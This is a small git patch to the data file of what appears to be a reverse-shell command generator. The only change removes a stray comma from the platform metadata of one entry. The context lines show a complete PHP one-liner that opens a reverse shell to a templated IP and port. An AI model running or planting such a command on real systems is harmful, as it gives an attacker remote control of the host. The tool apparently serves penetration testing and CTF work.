From 7c759e32ad02837caad59e7a849aad3d3c948e91 Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Thu, 31 Oct 2024 18:36:58 -0400 Subject: [PATCH] Update data.js --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index a8a5704..fe300a4 100644 --- a/js/data.js +++ b/js/data.js @@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType( { "name": "PHP exec", "command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'", - "meta": ["linux", , "mac"] + "meta": ["linux", "mac"] }, { "name": "PHP shell_exec",